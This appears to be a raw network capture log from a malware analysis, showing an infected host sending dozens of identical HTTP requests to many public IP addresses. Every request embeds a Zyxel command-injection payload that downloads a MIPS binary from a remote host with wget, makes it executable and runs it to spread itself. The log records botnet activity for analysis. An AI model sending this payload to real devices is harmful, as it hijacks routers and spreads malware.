                                                  Jan 19, 2024 18:23:47.893249035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2536192.168.2.134299412.194.65.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.893290043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2537192.168.2.136011071.124.6.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.893342018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2538192.168.2.135369417.86.207.107443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.893367052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2539192.168.2.136096020.236.12.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.893409014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2540192.168.2.1356928205.173.113.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.893460035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2541192.168.2.135017457.141.25.26443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.893477917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2542192.168.2.1334740125.228.226.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.893503904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2543192.168.2.1334562161.134.88.67443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.893568993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2544192.168.2.135796813.171.111.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.893620014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2545192.168.2.1336290209.13.142.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.893663883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2546192.168.2.1360364204.26.93.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.893682957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2547192.168.2.134564258.77.194.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.893740892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2548192.168.2.1339716199.58.163.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.893778086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2549192.168.2.1354380112.5.128.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.893831015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2550192.168.2.1355288219.74.201.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.893867970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2551192.168.2.1342378140.195.48.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.893923998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2552192.168.2.13581309.41.137.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.893959045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2553192.168.2.133941034.215.106.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.893996954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2554192.168.2.1356398173.161.32.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.894048929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2555192.168.2.1356840106.140.72.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.894083023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2556192.168.2.1345632211.45.225.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.894140959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2557192.168.2.134598638.21.3.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.894179106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2558192.168.2.1335790111.211.184.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.894217968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2559192.168.2.1359388166.153.105.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.894280910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2560192.168.2.133515492.135.220.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.894309044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2561192.168.2.1356738198.10.15.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.894347906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2562192.168.2.1354138187.217.39.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.894380093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2563192.168.2.1334280140.143.199.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.894443989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2564192.168.2.1348038171.36.65.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.894483089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2565192.168.2.135338418.239.174.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.894525051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2566192.168.2.134995069.167.27.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.894570112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2567192.168.2.1333768149.53.82.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.894628048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2568192.168.2.1348132188.196.10.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.894661903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2569192.168.2.1359656100.173.205.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.894702911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2570192.168.2.135672647.125.143.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.894745111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2571192.168.2.134149617.150.96.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.894777060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2572192.168.2.1335546191.78.41.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.894824982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2573192.168.2.1345618174.159.169.10443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.894857883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2574192.168.2.134572634.217.82.4443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.894901991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2575192.168.2.133410097.37.113.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.894961119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2576192.168.2.133902077.152.14.120443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.895006895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2577192.168.2.133503282.42.83.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.895028114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2578192.168.2.133630299.10.253.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.895075083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2579192.168.2.134761425.232.122.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.895114899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2580192.168.2.135116869.60.183.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.895169973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2581192.168.2.1351670221.174.195.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.895224094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2582192.168.2.1334346144.48.44.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.895246029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2583192.168.2.1345478154.65.246.220443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.895288944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2584192.168.2.135850462.145.102.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.895349026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2585192.168.2.1349072184.167.201.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.895376921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2586192.168.2.133845635.158.64.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.895411015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2587192.168.2.1342990195.160.23.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.895437956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2588192.168.2.134565869.82.241.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.895484924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2589192.168.2.1346472139.98.206.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.895528078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2590192.168.2.135655450.251.6.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.895564079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2591192.168.2.1354660134.155.146.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.895628929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2592192.168.2.13462085.171.98.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.895657063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2593192.168.2.1353176155.135.190.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.895693064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2594192.168.2.133910235.50.161.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.895757914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2595192.168.2.1352034150.192.218.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.895796061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2596192.168.2.1350154134.211.65.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.895839930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2597192.168.2.134017425.192.95.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.895884991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2598192.168.2.1351614163.155.43.210443
                                                  TimestampBytes transferredDirectionData
